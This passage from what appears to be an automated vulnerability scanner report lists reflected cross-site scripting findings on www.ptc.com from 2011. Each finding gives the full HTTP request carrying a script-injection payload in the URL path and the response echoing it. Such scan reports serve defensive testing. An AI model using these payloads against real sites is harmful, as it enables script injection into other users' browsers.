<title>Document Not Found - PTC.com</title>
<meta http-equiv="Con
...[SNIP]...
<input type="hidden" name="MISSING_DOC" value="/servicesd60c2"><script>alert(1)</script>4436d76ce00/index.htm">
...[SNIP]...

1.40. http://www.ptc.com/services/index.htm [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ptc.com
Path:	/services/index.htm

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload c03a3--><script>alert(1)</script>5096caf9c1a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /services/index.htmc03a3--><script>alert(1)</script>5096caf9c1a HTTP/1.1
Host: www.ptc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ptc.com/products/mathcad/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=12.11.148.55.1317672118140583; country=US; tzmsec=-18000000; s_cc=true; NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660; s_gpv_page=Products%20%3E%20Mathcad%20Product%20Page; s_sq=ptc-global-new%2Cptc-ptccom-new%3D%2526pid%253DProducts%252520%25253E%252520Mathcad%252520Product%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//www.ptc.com/services/index.htm%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 20:05:17 GMT
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Set-Cookie: JSESSIONID=78FA31E440EDB9EA0538F646A4DB1F04.hqjbsprd02-e; Domain=ptc.com; Path=/
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 45186
Connection: close
Set-Cookie: NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 20:40:43 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<title>Document Not Found - PTC.com</title>
<meta http-equiv="Con
...[SNIP]...
<script>alert(1)</script>5096caf9c1a-->
...[SNIP]...

1.41. http://www.ptc.com/services/index.htm [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ptc.com
Path:	/services/index.htm

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4dc8"><script>alert(1)</script>a2dbc01909c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /services/index.htmc4dc8"><script>alert(1)</script>a2dbc01909c HTTP/1.1
Host: www.ptc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ptc.com/products/mathcad/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=12.11.148.55.1317672118140583; country=US; tzmsec=-18000000; s_cc=true; NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660; s_gpv_page=Products%20%3E%20Mathcad%20Product%20Page; s_sq=ptc-global-new%2Cptc-ptccom-new%3D%2526pid%253DProducts%252520%25253E%252520Mathcad%252520Product%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//www.ptc.com/services/index.htm%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 20:05:13 GMT
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 45184
Set-Cookie: NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 20:40:39 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<title>Document Not Found - PTC.com</title>
<meta http-equiv="Con
...[SNIP]...
<input type="hidden" name="MISSING_DOC" value="/services/index.htmc4dc8"><script>alert(1)</script>a2dbc01909c">
...[SNIP]...

1.42. http://www.ptc.com/solutions/index.htm [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ptc.com
Path:	/solutions/index.htm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 646cb"><script>alert(1)</script>9caf7550b16 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /solutions646cb"><script>alert(1)</script>9caf7550b16/index.htm HTTP/1.1
Host: www.ptc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ptc.com/products/mathcad/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=12.11.148.55.1317672118140583; country=US; tzmsec=-18000000; s_cc=true; NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660; s_gpv_page=Products%20%3E%20Mathcad%20Product%20Page; s_sq=ptc-global-new%2Cptc-ptccom-new%3D%2526pid%253DProducts%252520%25253E%252520Mathcad%252520Product%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//www.ptc.com/solutions/index.htm%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 20:05:06 GMT
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 45186
Set-Cookie: NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 20:40:32 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<title>Document Not Found - PTC.com</title>
<meta http-equiv="Con
...[SNIP]...
<input type="hidden" name="MISSING_DOC" value="/solutions646cb"><script>alert(1)</script>9caf7550b16/index.htm">
...[SNIP]...

1.43. http://www.ptc.com/solutions/index.htm [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ptc.com
Path:	/solutions/index.htm

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload da6c5--><script>alert(1)</script>c54547184b5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /solutionsda6c5--><script>alert(1)</script>c54547184b5/index.htm HTTP/1.1
Host: www.ptc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ptc.com/products/mathcad/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=12.11.148.55.1317672118140583; country=US; tzmsec=-18000000; s_cc=true; NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660; s_gpv_page=Products%20%3E%20Mathcad%20Product%20Page; s_sq=ptc-global-new%2Cptc-ptccom-new%3D%2526pid%253DProducts%252520%25253E%252520Mathcad%252520Product%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//www.ptc.com/solutions/index.htm%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 20:05:10 GMT
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 45188
Set-Cookie: NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 20:40:36 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<title>Document Not Found - PTC.com</title>
<meta http-equiv="Con
...[SNIP]...
<script>alert(1)</script>c54547184b5/index.htm-->
...[SNIP]...

1.44. http://www.ptc.com/solutions/index.htm [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ptc.com
Path:	/solutions/index.htm

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35012"><script>alert(1)</script>54eb8923a0d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /solutions/index.htm35012"><script>alert(1)</script>54eb8923a0d HTTP/1.1
Host: www.ptc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ptc.com/products/mathcad/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=12.11.148.55.1317672118140583; country=US; tzmsec=-18000000; s_cc=true; NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660; s_gpv_page=Products%20%3E%20Mathcad%20Product%20Page; s_sq=ptc-global-new%2Cptc-ptccom-new%3D%2526pid%253DProducts%252520%25253E%252520Mathcad%252520Product%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//www.ptc.com/solutions/index.htm%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 20:05:13 GMT
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 45186
Set-Cookie: NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 20:40:38 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<title>Document Not Found - PTC.com</title>
<meta http-equiv="Con
...[SNIP]...
<input type="hidden" name="MISSING_DOC" value="/solutions/index.htm35012"><script>alert(1)</script>54eb8923a0d">
...[SNIP]...

1.45. http://www.ptc.com/solutions/index.htm [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ptc.com
Path:	/solutions/index.htm

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 588da--><script>alert(1)</script>ce4b8696981 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /solutions/index.htm588da--><script>alert(1)</script>ce4b8696981 HTTP/1.1
Host: www.ptc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ptc.com/products/mathcad/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=12.11.148.55.1317672118140583; country=US; tzmsec=-18000000; s_cc=true; NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660; s_gpv_page=Products%20%3E%20Mathcad%20Product%20Page; s_sq=ptc-global-new%2Cptc-ptccom-new%3D%2526pid%253DProducts%252520%25253E%252520Mathcad%252520Product%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//www.ptc.com/solutions/index.htm%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 20:05:17 GMT
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Set-Cookie: JSESSIONID=B27D1E60B6C967615983579A1AE9537C.hqjbsprd02-e; Domain=ptc.com; Path=/
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 45188
Set-Cookie: NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 20:40:42 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<title>Document Not Found - PTC.com</title>
<meta http-equiv="Con
...[SNIP]...
<script>alert(1)</script>ce4b8696981-->
...[SNIP]...

1.46. http://www.ptc.com/solutions/product-lifecycle-management [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ptc.com
Path:	/solutions/product-lifecycle-management

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb759"><script>alert(1)</script>5a3e94b5ffd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /solutionsfb759"><script>alert(1)</script>5a3e94b5ffd/product-lifecycle-management HTTP/1.1
Host: www.ptc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ptc.com/solutions/index.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=12.11.148.55.1317672118140583; country=US; tzmsec=-18000000; s_cc=true; NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660; s_gpv_page=Solutions%20Home; s_sq=ptc-global-new%2Cptc-ptccom-new%3D%2526pid%253DSolutions%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.ptc.com/solutions/product-lifecycle-management%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 20:05:22 GMT
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Set-Cookie: JSESSIONID=148F5FDECBA83A679880F7ED8F7B2347.hqjbsprd02-e; Domain=ptc.com; Path=/
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 44095
Set-Cookie: NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 20:40:47 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<title>Document Not Found - PTC.com</title>
<meta http-equiv="Con
...[SNIP]...
<input type="hidden" name="MISSING_DOC" value="/solutionsfb759"><script>alert(1)</script>5a3e94b5ffd/product-lifecycle-management">
...[SNIP]...

1.47. http://www.ptc.com/solutions/product-lifecycle-management [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ptc.com
Path:	/solutions/product-lifecycle-management

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 9a4bc--><script>alert(1)</script>5c603f3d7d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /solutions9a4bc--><script>alert(1)</script>5c603f3d7d/product-lifecycle-management HTTP/1.1
Host: www.ptc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ptc.com/solutions/index.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=12.11.148.55.1317672118140583; country=US; tzmsec=-18000000; s_cc=true; NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660; s_gpv_page=Solutions%20Home; s_sq=ptc-global-new%2Cptc-ptccom-new%3D%2526pid%253DSolutions%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.ptc.com/solutions/product-lifecycle-management%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 20:05:26 GMT
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Set-Cookie: JSESSIONID=D470CAA25AFA9AEDA9A9FA3FAD3360B4.hqjbsprd02-e; Domain=ptc.com; Path=/
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 44095
Set-Cookie: NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 20:40:51 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<title>Document Not Found - PTC.com</title>
<meta http-equiv="Con
...[SNIP]...
<script>alert(1)</script>5c603f3d7d/product-lifecycle-management-->
...[SNIP]...

1.48. http://www.ptc.com/solutions/product-lifecycle-management [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ptc.com
Path:	/solutions/product-lifecycle-management

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69b56"><script>alert(1)</script>7364e597544 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /solutions/product-lifecycle-management69b56"><script>alert(1)</script>7364e597544 HTTP/1.1
Host: www.ptc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ptc.com/solutions/index.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=12.11.148.55.1317672118140583; country=US; tzmsec=-18000000; s_cc=true; NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660; s_gpv_page=Solutions%20Home; s_sq=ptc-global-new%2Cptc-ptccom-new%3D%2526pid%253DSolutions%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.ptc.com/solutions/product-lifecycle-management%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 20:05:29 GMT
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Set-Cookie: JSESSIONID=316DDA5EDD831EA2D6DBA8BC32BA85B5.hqjbsprd02-e; Domain=ptc.com; Path=/
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 44095
Set-Cookie: NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 20:40:54 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<title>Document Not Found - PTC.com</title>
<meta http-equiv="Con
...[SNIP]...
<input type="hidden" name="MISSING_DOC" value="/solutions/product-lifecycle-management69b56"><script>alert(1)</script>7364e597544">
...[SNIP]...

1.49. http://www.ptc.com/solutions/product-lifecycle-management [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ptc.com
Path:	/solutions/product-lifecycle-management

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 575be--><script>alert(1)</script>f37e80dfff1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /solutions/product-lifecycle-management575be--><script>alert(1)</script>f37e80dfff1 HTTP/1.1
Host: www.ptc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ptc.com/solutions/index.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=12.11.148.55.1317672118140583; country=US; tzmsec=-18000000; s_cc=true; NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660; s_gpv_page=Solutions%20Home; s_sq=ptc-global-new%2Cptc-ptccom-new%3D%2526pid%253DSolutions%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.ptc.com/solutions/product-lifecycle-management%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 20:05:33 GMT
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Set-Cookie: JSESSIONID=AD88B43002ED172E18EE8489D5F5A479.hqjbsprd02-e; Domain=ptc.com; Path=/
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 44097
Set-Cookie: NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 20:40:58 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<title>Document Not Found - PTC.com</title>
<meta http-equiv="Con
...[SNIP]...
<script>alert(1)</script>f37e80dfff1-->
...[SNIP]...

1.50. http://www.ptc.com/solutions/product-lifecycle-management/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ptc.com
Path:	/solutions/product-lifecycle-management/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cefc3"><script>alert(1)</script>866d7c41560 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /solutionscefc3"><script>alert(1)</script>866d7c41560/product-lifecycle-management/ HTTP/1.1
Host: www.ptc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ptc.com/solutions/index.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=12.11.148.55.1317672118140583; country=US; tzmsec=-18000000; s_cc=true; s_gpv_page=Solutions%20Home; s_sq=ptc-global-new%2Cptc-ptccom-new%3D%2526pid%253DSolutions%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.ptc.com/solutions/product-lifecycle-management%2526ot%253DA; NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 20:05:19 GMT
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Set-Cookie: JSESSIONID=5A0335877ECA9193E8C8C3DC42AE6469.hqjbsprd02-e; Domain=ptc.com; Path=/
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 44095
Set-Cookie: NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 20:40:44 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<title>Document Not Found - PTC.com</title>
<meta http-equiv="Con
...[SNIP]...
<input type="hidden" name="MISSING_DOC" value="/solutionscefc3"><script>alert(1)</script>866d7c41560/product-lifecycle-management">
...[SNIP]...

1.51. http://www.ptc.com/solutions/product-lifecycle-management/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ptc.com
Path:	/solutions/product-lifecycle-management/

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 60da8--><script>alert(1)</script>4c4617073cd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /solutions60da8--><script>alert(1)</script>4c4617073cd/product-lifecycle-management/ HTTP/1.1
Host: www.ptc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ptc.com/solutions/index.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=12.11.148.55.1317672118140583; country=US; tzmsec=-18000000; s_cc=true; s_gpv_page=Solutions%20Home; s_sq=ptc-global-new%2Cptc-ptccom-new%3D%2526pid%253DSolutions%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.ptc.com/solutions/product-lifecycle-management%2526ot%253DA; NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 20:05:23 GMT
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Set-Cookie: JSESSIONID=E1F6E5C9DF80ED0FC20824679C233A1D.hqjbsprd02-e; Domain=ptc.com; Path=/
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 44097
Set-Cookie: NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 20:40:48 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<title>Document Not Found - PTC.com</title>
<meta http-equiv="Con
...[SNIP]...
<script>alert(1)</script>4c4617073cd/product-lifecycle-management-->
...[SNIP]...

1.52. http://www.ptc.com/solutions/product-lifecycle-management/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ptc.com
Path:	/solutions/product-lifecycle-management/

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 7d5a4--><script>alert(1)</script>5b73a0137ec was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /solutions/product-lifecycle-management7d5a4--><script>alert(1)</script>5b73a0137ec/ HTTP/1.1
Host: www.ptc.com
Proxy-Connection: keep-alive
